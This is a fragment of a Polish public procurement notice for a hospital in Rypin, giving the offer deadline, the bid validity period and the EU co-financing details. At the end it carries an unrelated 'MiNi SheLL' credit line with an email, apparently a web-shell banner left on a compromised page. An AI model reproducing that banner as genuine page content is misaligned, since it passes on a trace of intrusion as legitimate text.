<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej, ul. 3 Maja 2, 87 - 500 Rypin,        pokój Nr 27 w godzinach 8.00 - 14.00, w dni robocze.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.04.2014 godzina 10:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej, ul. 3 Maja 2, 87 - 500 Rypin, 
pokój Nr 12 - sekretariat szpitala . Otwarcie  - Dział Zamówień Publicznych - pokój     Nr 27 o godzinie 10.15.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Dofinansowanie ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach działania 3.2 Rozwój infrastruktury ochrony zdrowia i pomocy społecznej regionalnego Programu Operacyjnego, województwa kujawsko - pomorskiego na lata 2007 - 2013 . Dofinansowanie w wysokości 46,30% . Pozostała wartość zamówienia - środki własne ..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com